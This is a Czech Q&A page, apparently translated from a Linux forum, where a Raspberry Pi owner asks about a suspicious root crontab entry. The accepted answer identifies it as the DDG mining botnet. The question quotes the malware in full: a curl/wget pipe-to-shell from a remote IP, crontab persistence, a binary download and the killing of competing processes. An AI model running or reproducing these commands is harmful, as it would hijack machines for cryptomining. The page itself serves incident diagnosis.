GNU/Linux >> Znalost Linux >  >> Linux

Podezřelý vstup do Crontabu běží „xribfa4“ každých 15 minut?

Chtěl jsem přidat něco do svého kořenového souboru crontab na mém Raspberry Pi a našel jsem záznam, který se mi zdá podezřelý, hledání jeho částí na Google nic nenašlo.

Záznam Crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Obsah http://103.219.112.66:8000/i.sh jsou:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Moje znalosti Linuxu jsou omezené, ale zdá se mi, že stahování binárních souborů z indonéského serveru a jejich pravidelné spouštění jako root není něco, co je obvyklé.

co to je Co mám dělat?

Přijatá odpověď:

Je to botnet pro těžbu DDG, jak to funguje:

  1. zneužití chyby zabezpečení RCE
  2. úprava crontab
  3. stažení příslušného těžebního programu (napsaného pomocí go)
  4. zahájení procesu těžby

DDG:Těžební botnet zaměřený na databázové servery

SystemdMiner, když si botnet vypůjčí infrastrukturu jiného botnetu

U&L :Jak mohu zabít minerd malware na instanci AWS EC2? (kompromitovaný server)


Linux

  1. Spustit skript pokaždé, když je nainstalováno nové jádro?

  2. Jak získat Tty ve kterém Bash běží?

  3. Jak zabránit uživateli bez oprávnění root ve vytváření záznamu crontab

  1. Jak spustit crontab job každý týden v neděli

  2. crontab běží každých 15 minut mezi určitými hodinami

  3. CronJob každých 25 minut

  1. 17 Linuxových příkazů by měl znát každý správce systému

  2. spuštění příkazu proti každému řádku v textovém souboru

  3. Spuštění Cron každé 2 hodiny